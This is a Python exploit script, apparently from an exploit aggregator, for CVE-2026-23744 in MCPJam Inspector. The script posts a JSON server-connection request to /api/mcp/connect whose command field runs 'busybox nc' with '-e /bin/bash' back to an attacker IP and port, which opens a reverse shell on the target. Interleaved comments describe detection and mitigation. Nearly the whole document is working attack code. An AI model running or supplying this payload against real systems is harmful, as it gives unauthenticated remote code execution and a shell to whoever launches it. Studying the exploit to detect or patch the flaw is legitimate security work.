## https://sploitus.com/exploit?id=PACKETSTORM:217697
#!/usr/bin/env python3
#################################
# #
# CVE-2026-23744.py #
# for testing only #
# #
#################################
import requests
import argparse
import json
import sys
import urllib3
# Silence the InsecureRequestWarning that urllib3 emits for unverified HTTPS
# requests. main() posts with verify=False, so certificate validation is off
# for the request this script makes and nothing authenticates the peer.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
def main():
# Command-line entry point of a proof-of-concept for CVE-2026-23744
# (GHSA-232v-j27c-5pp6) in MCPJam Inspector: it reads three required options,
# posts one JSON document to <target>/api/mcp/connect and prints the HTTP
# status code and response body.
# NOTE(review): indentation was lost in this listing, so the nesting of the
# statements below is inferred from their order, not shown by the text.
parser = argparse.ArgumentParser(description='MCPJam Inspector RCE (GHSA-232v-j27c-5pp6) - CVE-2026-23744')
parser.add_argument('--target', '-t', required=True, help='Target URL e.g. https://mcp.domain.com')
parser.add_argument('--att-ip', '-i', required=True, help='Attacker IP for revshell listener')
parser.add_argument('--att-port', '-p', required=True, help='Attacker port for revshell listener')
args = parser.parse_args()
# --target is concatenated as given; no scheme check or trailing-slash
# normalisation is applied before the path is appended.
url = f'{args.target}/api/mcp/connect'
# The body is a server-connection request: serverConfig.command and
# serverConfig.args name a program and its arguments, and no credential,
# token or cookie is attached anywhere in this script. Presumably an affected
# instance starts that program itself when it handles the request, which is
# what the advisory title calls RCE.
# Detection: alert on POST /api/mcp/connect arriving from a non-local address,
# on a serverConfig.command that is a shell or networking utility, and on the
# inspector process spawning such a child or opening an outbound connection.
# Mitigation: apply the fixed release named in GHSA-232v-j27c-5pp6 and keep
# the inspector's HTTP port unreachable from untrusted networks.
data = {"serverConfig": {"command": "busybox", "args": ["nc", args.att_ip, args.att_port, "-e", "/bin/bash"], "env": {}}, "serverId": "mcp_test_server"}
print(f"\n{parser.description}\n")
print(f"[+] Sending revshell to {args.att_ip}:{args.att_port} via {url}")
print(f"[+] Payload: {json.dumps(data)}")
try:
# verify=False skips TLS certificate validation; timeout=10 bounds the wait
# for a response to ten seconds.
response = requests.post(url, json=data, verify=False, timeout=10)
print(f"[+] Status: {response.status_code}")
print(f"[+] Response: {response.text}")
# The script treats any 200 as success; the status alone only shows that the
# endpoint accepted the request, not what the server did with it.
if response.status_code == 200:
print("[+] Check your listener!")
else:
print("[-] Exploit failed - check target/path")
# RequestException is the base class for requests' connection errors and
# timeouts, so a missing response lands here.
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
# NOTE(review): with the indentation lost it is unclear whether the next two
# lines belong to the except branch or run after the try/except in every case;
# confirm against the original file.
print("[+] Check your listener, script did not detect response.")
sys.exit(1)
# Run the command-line entry point only when the file is executed as a
# script, so importing the module sends nothing.
if __name__ == "__main__":
    main()